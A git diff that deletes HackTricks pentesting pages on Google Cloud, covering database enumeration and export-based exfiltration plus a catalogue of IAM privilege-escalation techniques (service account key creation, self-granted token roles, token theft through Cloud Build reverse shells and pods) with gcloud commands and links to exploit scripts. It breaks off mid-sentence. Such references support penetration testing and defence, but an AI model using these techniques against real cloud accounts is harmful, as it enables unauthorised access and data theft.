- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-databases-enumeration.md b/cloud-security/gcp-security/gcp-databases-enumeration.md deleted file mode 100644 index 6a417ad8c..000000000 --- a/cloud-security/gcp-security/gcp-databases-enumeration.md +++ /dev/null @@ -1,129 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -Google has [a handful of database technologies](https://cloud.google.com/products/databases/) that you may have access to via the default service account or another set of credentials you have compromised thus far. - -Databases will usually contain interesting information, so it would be completely recommended to check them. Each database type provides various **`gcloud` commands to export the data**. This typically involves **writing the database to a cloud storage bucket first**, which you can then download. It may be best to use an existing bucket you already have access to, but you can also create your own if you want. - -As an example, you can follow [Google's documentation](https://cloud.google.com/sql/docs/mysql/import-export/exporting) to exfiltrate a Cloud SQL database. - -## [Cloud SQL](https://cloud.google.com/sdk/gcloud/reference/sql/) - -Cloud SQL instances are **fully managed, relational MySQL, PostgreSQL and SQL Server databases**. Google handles replication, patch management and database management to ensure availability and performance.[Learn more](https://cloud.google.com/sql/docs/) - -If you find any of these instances in use, you could try to **access it from the internet** as they might be miss-configured and accessible. - -```bash -# Cloud SQL -gcloud sql instances list -gcloud sql databases list --instance [INSTANCE] -gcloud sql backups list --instance [INSTANCE] -gcloud sql export sql gs:///cloudsql/export.sql.gz --database -``` - -## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/) - -Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability. - -```bash -# Cloud Spanner -gcloud spanner instances list -gcloud spanner databases list --instance [INSTANCE] -gcloud spanner backups list --instance [INSTANCE] -``` - -## [Cloud Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) - -A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable). - -```bash -# Cloud Bigtable -gcloud bigtable instances list -gcloud bigtable clusters list -gcloud bigtable backups list --instance [INSTANCE] -``` - -## [Cloud Firestore](https://cloud.google.com/sdk/gcloud/reference/firestore/) - -Cloud Firestore is a flexible, scalable database for mobile, web, and server development from Firebase and Google Cloud. Like Firebase Realtime Database, it keeps your data in sync across client apps through realtime listeners and offers offline support for mobile and web so you can build responsive apps that work regardless of network latency or Internet connectivity. Cloud Firestore also offers seamless integration with other Firebase and Google Cloud products, including Cloud Functions. [Learn more](https://firebase.google.com/docs/firestore). - -``` -gcloud firestore indexes composite list -gcloud firestore indexes fields list -gcloud firestore export gs://my-source-project-export/export-20190113_2109 --collection-ids='cameras','radios' -``` - -## [Firebase](https://cloud.google.com/sdk/gcloud/reference/firebase/) - -The Firebase Realtime Database is a cloud-hosted NoSQL database that lets you store and sync data between your users in realtime. [Learn more](https://firebase.google.com/products/realtime-database/). - -## Memorystore - -Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more. - -```bash -gcloud memcache instances list --region [region] -# You should try to connect to the memcache instances to access the data - -gcloud redis instances list --region [region] -gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1 -``` - -## [Bigquery](https://cloud.google.com/bigquery/docs/bq-command-line-tool) - -BigQuery is a fully-managed enterprise data warehouse that helps you manage and analyze your data with built-in features like machine learning, geospatial analysis, and business intelligence. BigQuery’s serverless architecture lets you use SQL queries to answer your organization’s biggest questions with zero infrastructure management. BigQuery’s scalable, distributed analysis engine lets you query terabytes in seconds and petabytes in minutes. [Learn more](https://cloud.google.com/bigquery/docs/introduction). - -```bash -bq ls -p #List rojects -bq ls -a #List all datasets -bq ls #List datasets from current project -bq ls #List tables inside the DB - -# Show information -bq show ":" -bq show ":." -bq show --encryption_service_account - -bq query '' #Query inside the dataset - -# Dump the table or dataset -bq extract ds.table gs://mybucket/table.csv -bq extract -m ds.model gs://mybucket/model -``` - -Big query SQL Injection: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/README.md b/cloud-security/gcp-security/gcp-interesting-permissions/README.md deleted file mode 100644 index abc9b2d0b..000000000 --- a/cloud-security/gcp-security/gcp-interesting-permissions/README.md +++ /dev/null @@ -1,77 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Introduction to GCP Privilege Escalation - -GCP, as any other cloud, have some **principals**: users, groups and service accounts, and some **resources** like compute engine, cloud functions…\ -Then, via roles, **permissions are granted to those principals over the resources**. This is the way to specify the permissions a principal has over a resource in GCP.\ -There are certain permissions that will allow a user to **get even more permissions** on the resource or third party resources, and that’s what is called **privilege escalation** (also, the exploitation the vulnerabilities to get more permissions). - -Therefore, I would like to separate GCP privilege escalation techniques in **2 groups**: - -* **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all his permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account. -* **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse _setIamPolicy_ permission over cloudfunctions to allow you to trigger the function. - * Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now it’s less frequent (but can still happen). - -Obviously, the most interesting privilege escalation techniques are the ones of the **second group** because it will allow you to **get more privileges outside of the resources you already have** some privileges over. However, note that **escalating in resources** may give you also access to **sensitive information** or even to **other principals** (maybe via reading a secret that contains a token of a SA). - -{% hint style="warning" %} -It's important to note also that in **GCP Service Accounts are both principals and permissions**, so escalating privileges in a SA will allow you to impersonate it also. -{% endhint %} - -{% hint style="info" %} -The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API. -{% endhint %} - -# Privilege Escalation to Principals - -Check all the **known permissions** that will allow you to **escalate privileges over other principals** in: - -{% content-ref url="gcp-privesc-to-other-principals.md" %} -[gcp-privesc-to-other-principals.md](gcp-privesc-to-other-principals.md) -{% endcontent-ref %} - -# Privilege Escalation to Resources - -Check all the **known permissions** that will allow you to **escalate privileges over other resources** in: - -{% content-ref url="gcp-privesc-to-resources.md" %} -[gcp-privesc-to-resources.md](gcp-privesc-to-resources.md) -{% endcontent-ref %} - -# - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md deleted file mode 100644 index fc445c892..000000000 --- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md +++ /dev/null @@ -1,340 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -{% hint style="info" %} -GCP has **hundreds of permissions**. This is just a list containing the **known** ones that could allow you to escalate to other principals.\ -If you know about any other permissions not mentioned here, **please send a PR to add it** or let me know and I will add it. -{% endhint %} - -# IAM - -## iam.roles.update (iam.roles.get) - -If you have the mentioned permissions you will be able to update a role assigned to you and give you extra permissions to other resources like: - -```bash -gcloud iam roldes update --project --add-permissions -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](gcp-privesc-to-other-principals.md#deploymentmanager) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -## iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get) - -This permission allows to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours. - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -## iam.serviceAccountKeys.create - -This permission allows us to do something similar to the previous method, but instead of an access token, we are **creating a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account. - -```bash -gcloud iam service-accounts keys create --iam-account -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -Note that **iam.serviceAccountKeys.update won't work to modify the key** of a SA because to do that the permissions iam.serviceAccountKeys.create is also needed. - -## iam.serviceAccounts.implicitDelegation - -If you have the _**iam.serviceAccounts.implicitDelegation**_** permission on a Service Account** that has the _**iam.serviceAccounts.getAccessToken**_** permission on a third Service Account**, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png) - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. - -## iam.serviceAccounts.signBlob - -The _iam.serviceAccounts.signBlob_ permission β€œallows signing of arbitrary payloads” in GCP. This means we can **create an unsigined JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed). - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -## iam.serviceAccounts.signJwt - -Similar to how the previous method worked by signing arbitrary payloads, this method works by signing well-formed JSON web tokens (JWTs). The difference with the previous method is that **instead of making google sign a blob containing a JWT, we use the signJWT method that already expects a JWT**. This makes it easier to use but you can only sign JWT instead of any bytes. - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/7-iam.serviceAccounts.signJWT.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signJWT.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). - -## iam.serviceAccounts.setIamPolicy - -This permission allows to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the β€œroles/iam.serviceAccountTokenCreator” role over the interesting SA: - -```bash -gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ - --member="user:username@domain.com" \ - --role="roles/iam.serviceAccountTokenCreator" -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.** - -## iam.serviceAccounts.actAs - -This means that as part of creating certain resources, you must β€œactAs” the Service Account for the call to complete successfully. For example, when starting a new Compute Engine instance with an attached Service Account, you need _iam.serviceAccounts.actAs_ on that Service Account. This is because without that permission, users could escalate permissions with fewer permissions to start with. - -**There are multiple individual methods that use \_iam.serviceAccounts.actAs**\_**, so depending on your own permissions, you may only be able to exploit one (or more) of these methods below**. These methods are slightly different in that they **require multiple permissions to exploit, rather than a single permission** like all of the previous methods. - -## iam.serviceAccounts.getOpenIdToken - -This permission can be used to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource. - -According to this [**interesting post**](https://medium.com/google-cloud/authenticating-using-google-openid-connect-tokens-e7675051213b), it's necessary to indicate the audience (service where you want to use the token to authenticate to) and you will receive a JWT signed by google indicating the service account and the audience of the JWT. - -You can generate an OpenIDToken (if you have the access) with: - -```bash -# First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA -gcloud auth activate-service-account --key-file=/path/to/svc_account.json -# Then, generate token -gcloud auth print-identity-token "${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" --audiences=https://example.com -``` - -Then you can just use it to access the service with: - -```bash -curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app -``` - -Some services that support authentication via this kind of tokens are: - -* [Google Cloud Run](https://cloud.google.com/run/) -* [Google Cloud Functions](https://cloud.google.com/functions/docs/) -* [Google Identity Aware Proxy](https://cloud.google.com/iap/docs/authentication-howto) -* [Google Cloud Endpoints](https://cloud.google.com/endpoints/docs/openapi/authenticating-users-google-id) (if using Google OIDC) - -You can find an example on how to create and OpenID token behalf a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py). - -# resourcemanager - -## resourcemanager.organizations.setIamPolicy - -Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example. - -## resourcemanager.folders.setIamPolicy - -Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example. - -## resourcemanager.projects.setIamPolicy - -Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example. - -# deploymentmanager - -## deploymentmanager.deployments.create - -This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it. - -You could actually **launch any resource** listed in `gcloud deployment-manager types list` - -In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.** - -## deploymentmanager.deployments.**update** - -This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful) - -Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.** - -## deploymentmanager.deployments.**setIamPolicy** - -This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previos _deploymentmanager.deployments.create_ section. - -# cloudbuild - -## cloudbuild.builds.create - -With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the powerful cloudbuild Service Account**: `@cloudbuild.gserviceaccount.com` . However, you can **indicate any service account inside the project** in the cloudbuild configuration.\ -Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change). - -You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside of the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.** - -For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/) - -## cloudbuild.builds.update - -**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API). - -# compute - -## compute.projects.setCommonInstanceMetadata - -With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ -Limitations: - -* Note that GCP Service Accounts running in VM instances by default have a **very limited scope** -* You will need to be **able to contact the SSH** server to login - -For more information about how to exploit this permission check: - -{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} - -## compute.instances.setMetadata - -This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations applies**. - -## compute.instances.setIamPolicy - -This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. - -## **compute.instances.osLogin** - -If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You won't have root privs inside the instance. - -## **compute.instances.osAdminLogin** - -If OSLogin is enabled in the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have root privs inside the instance. - -# container - -## container.clusters.get - -This permission allows to **gather credentials for the Kubernetes cluster** using something like: - -```bash -gcloud container clusters get-credentials --zone -``` - -Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment. - -{% hint style="info" %} -Note that **kubernetes clusters might be configured to be private**, that will disallow that access to the Kube-API server from the Internet. -{% endhint %} - -## container.clusters.getCredentials - -Apparently this permission might be useful to gather auth credentials (basic auth method isn't supported anymore by GKE if you use the latest GKE versions). - -## container.roles.escalate/container.clusterRoles.escalate - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour. - -**container.roles.create** and/or **container.roles.update** OR **container.clusterRoles.create** and/or **container.clusterRoles.update** respectively are also **necessary** to perform those privilege escalation actions.\ - - -## container.roles.bind/container.clusterRoles.bind - -**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour. - -**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively are also **necessary** to perform those privilege escalation actions. - -## container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update - -All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\ -For more information check: - -{% content-ref url="../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used). - -## container.secrets.get, container.secrets.list - -As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#listing-secrets), with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them. - -## container.pods.exec - -With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**. - -## container.pods.portForward - -As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#port-forward), with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.** - -## container.serviceAccounts.createToken - -Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it. - -## container.mutatingWebhookConfigurations.create, container.mutatingWebhookConfigurations.update - -These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\ -For more information [**follow this link**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller). - -# storage - -## storage.hmacKeys.create - -There is a feature of Cloud Storage, β€œinteroperability”, that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**. - -HMAC keys belonging to your user cannot be accessed through the API and must be accessed through the web console, but what’s nice is that both the access key and secret key are available at any point. This means we could take an existing pair and store them for backup access to the account. HMAC keys belonging to Service Accounts **can** be accessed through the API, but after creation, you are not able to see the access key and secret again. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-1.png) - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). - -## storage.objects.get - -This permission allows you to **download files stored inside Gcp Storage**. This will potentially allow you to escalate privileges because in some occasions **sensitive information is saved there**. Moreover, some Gcp services stores their information in buckets: - -* **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code. -* **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**. - -## storage.objects.create, storage.objects.delete - -In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object\_permissions), you need also `storage.objects.delete` to **modify** an existent object. - -A very **common exploitation** of buckets where you can write in cloud is in case the **bucket is saving web server files**, you might be able to **store new code** that will be used by the web application. - -Moreover, several GCP services also **store code inside buckets** that later is **executed**: - -* **GCP Composer**: The **DAG code** is **stored in GCP Storage**. This **code** is later **executed** inside the **K8s environment** used by composer, and has also **access to a GCP SA**. Therefore, modifying this code you might be able to get inside the composer k8s env and steal the token of the GCP SA used. -* **GCR (Container Registry)**: The **container images are stored inside buckets**. So if you have write access over them, you could **modify the images** and execute your own code whenever that container is used. - * The bucket used by GCR 